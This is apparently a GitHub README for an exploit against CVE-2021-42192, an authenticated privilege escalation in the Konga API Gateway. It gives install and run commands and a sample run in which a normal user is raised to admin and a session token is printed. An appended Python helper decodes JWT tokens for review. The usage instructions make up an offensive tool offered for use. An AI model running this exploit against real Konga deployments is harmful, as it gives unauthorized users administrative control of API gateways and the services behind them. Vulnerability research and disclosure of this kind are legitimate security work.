whokilleddb/Konga-Privilege-Escalation-Exploit
Konga Privilege Escalation - CVE-2021-42192

Authenticated Privilege Escalation In Konga API Gateway

Description

A bug in the Konga API Gateway allows any authenticated user to escalate to Admin by sending a specially crafted request.

Usage

  • First clone the repository and make the script executable:
$ git clone https://github.com/whokilleddb/Konga-Privilege-Escalation-Exploit
$ cd Konga-Privilege-Escalation-Exploit
$ sudo pip3 install -r requirements.txt
$ chmod +x exploit.py
$ ./exploit.py --help
[~] Konga Privilege Escalation by @whokilleddb
usage: exploit.py [-h] -U Username -P Password URL

positional arguments:
  URL          Base URL(Including Port)

optional arguments:
  -h, --help   show this help message and exit
  -U Username  Username For Authentication
  -P Password  Password For Authentication
  • Then run the exploit by providing the username and password. Example:
$ ./exploit.py -U user -P password http://192.168.0.104:1337
[~] Konga Privilege Escalation by @whokilleddb
[+] Target Info:
+----------+----------------------------+
| URL      | http://192.168.0.104:1337/ |
+----------+----------------------------+
| Username | user                       |
+----------+----------------------------+
| Password | password                   |
+----------+----------------------------+

[+] User ID: 2
[+] Token Found As: eyJhbGciOiJIUzI1NiJ9.Mg._bgkwMqrKxFvVhupixHLIfvF5WpbihENyFpTQN5Eito
[+] Successfully Escalated To ADMIN
[+] Remember To Refresh The Page!
[Screenshots: Before / After]
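The token the script prints above is a JWT. The following inspection helper is an added example (not part of this repository) that decodes its header and payload without verifying the signature, so a reviewer can see what claims a session token actually carries; run against the token from the sample output it shows an HS256 header and a payload that is just the user id 2, matching the "[+] User ID: 2" line.

```python
import base64
import json

# Token copied from the README's sample run above (not constructed here).
SAMPLE_TOKEN = "eyJhbGciOiJIUzI1NiJ9.Mg._bgkwMqrKxFvVhupixHLIfvF5WpbihENyFpTQN5Eito"


def b64url_decode(segment: str) -> bytes:
    """Decode one base64url segment, restoring the '=' padding JWTs strip."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def inspect_jwt(token: str) -> dict:
    """Split a JWT into header, payload and signature length.

    No signature verification is done: this is a review helper for seeing
    which claims a token carries, not an authentication step.
    """
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("expected three dot-separated JWT segments")
    header_raw, payload_raw, signature_raw = parts
    header = json.loads(b64url_decode(header_raw))
    payload_bytes = b64url_decode(payload_raw)
    try:
        payload = json.loads(payload_bytes)  # a bare "2" parses as the int 2
    except json.JSONDecodeError:
        payload = payload_bytes.decode("utf-8", errors="replace")
    return {
        "header": header,
        "payload": payload,
        "signature_len": len(b64url_decode(signature_raw)),  # 32 bytes for HS256
    }


def has_expiry(payload) -> bool:
    """True only when the payload is a claims object that carries 'exp'."""
    return isinstance(payload, dict) and "exp" in payload


if __name__ == "__main__":
    info = inspect_jwt(SAMPLE_TOKEN)
    print(info)
    print("expiry claim present:", has_expiry(info["payload"]))
```

A token whose payload is a bare identifier with no expiry or role claims is worth flagging in a review of any session-token scheme.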
